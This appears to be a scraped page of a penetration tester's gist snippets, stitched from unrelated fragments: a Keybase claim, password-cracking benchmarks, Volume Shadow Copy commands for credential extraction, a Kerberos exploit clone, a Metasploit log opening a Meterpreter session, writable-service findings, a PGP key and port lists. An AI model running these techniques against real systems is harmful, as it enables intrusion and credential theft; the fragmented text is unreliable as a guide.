I hereby claim:
- I am jstnkndy on github.
- I am jstnkndy (https://keybase.io/jstnkndy) on keybase.
- I have a public key whose fingerprint is FBB7 24C7 49C7 5C6F F61D BB37 7BCB 00C9 1BC9 1458
To claim this, I am signing this object:
Hash.Type......: MD5 | |
Speed.GPU.#1...: 6207.8M/s | |
Speed.GPU.#2...: 6224.3M/s | |
Speed.GPU.#3...: 6222.7M/s | |
Speed.GPU.#4...: 6222.8M/s | |
Speed.GPU.#5...: 6207.4M/s | |
Speed.GPU.#6...: 6221.6M/s | |
Speed.GPU.#7...: 6207.2M/s | |
Speed.GPU.#*...: 43513.8M/s |
./john --test | |
Will run 32 OpenMP threads | |
Benchmarking: descrypt, traditional crypt(3) [DES 128/128 AVX-16]... (32xOMP) DONE | |
Many salts: 73400K c/s real, 2290K c/s virtual | |
Only one salt: 38535K c/s real, 1202K c/s virtual | |
Benchmarking: bsdicrypt, BSDI crypt(3) ("_J9..", 725 iterations) [DES 128/128 AVX-16]... (32xOMP) DONE | |
Many salts: 2441K c/s real, 76407 c/s virtual | |
Only one salt: 1466K c/s real, 45867 c/s virtual |
# Start the Volume Shadow Service | |
C:\bak>cscript vssown.vbs /start | |
Microsoft (R) Windows Script Host Version 5.8 | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
[*] Signal sent to start the VSS service. | |
# Create a Volument Shadow Copy, C is the drive where the files reside, this may not always be C |
git clone https://github.com/bidord/pykek | |
echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts | |
[*] [2014.12.05-23:43:51] 172.16.80.100 web_delivery - Delivering Payload | |
[*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100 | |
[*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000 | |
20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12 | |
[*] Starting interaction with 12... |
#!/usr/bin/python | |
import sys, requests | |
def usage(): | |
print 'Usage: python %s ' % sys.argv[0] | |
def main(): | |
if len(sys.argv) != 5: |
I hereby claim:
To claim this, I am signing this object:
-----BEGIN PGP PUBLIC KEY BLOCK----- | |
Version: GnuPG v1 | |
mQINBFOsTdQBEACcbca5WpSCz00cZoJFuU77MVR3Esbw4JuD0Lkwp1jbOzne7+ul | |
58mfA+RqvApV2d7Kk4kdVzdBrWropYOMfYAoTPCasrpZ6dyXtJoVmfldn6d7RXJB | |
xm+A8NFi8e1XzM6AbIT/gvCkZefUN1AQ5jeN5Hh/+S/VWz9bbsfKnYxgv181DT4C | |
xbQv4q0NMrZmKEkFh4KLAQBY+DCnCwvXuTlhpuQ+1uBC/S2VVTBcvN1i0CLLy9FW | |
TkvTQWeR8nCJ3TTipkyiifZpRFMb0v/YmZ1NQQxTLkQFlWrPEczgTHvl80Gq75V9 | |
iA1w41j9XR+CG0D3CrmfoT/spiikydGojRV9vGvpVtknmVddnS5FrNRVEMdeb3ge | |
BR8HD4zUnj1zjSMDOaPBSCb9bX/NDLQMMrPX545NwYVjjHItChMjuxZcbW6QZ3cn |
Path : c:\program files (x86)\trend micro\client server security agent\ccsf\tmccsf.exe | |
Used by services : TmCCSF | |
File write allowed for groups : Everyone | |
Full control of directory allowed for groups : Everyone | |
Path : c:\program files (x86)\trend micro\client server security agent\hostedagent\svcgenerichost.exe | |
Used by services : svcGenericHost | |
File write allowed for groups : Everyone | |
Full control of directory allowed for groups : Everyone |
80 | |
23 | |
443 | |
21 | |
22 | |
25 | |
3389 | |
110 | |
445 | |
139 |
631 | |
161 | |
137 | |
123 | |
138 | |
1434 | |
445 | |
135 | |
67 | |
53 |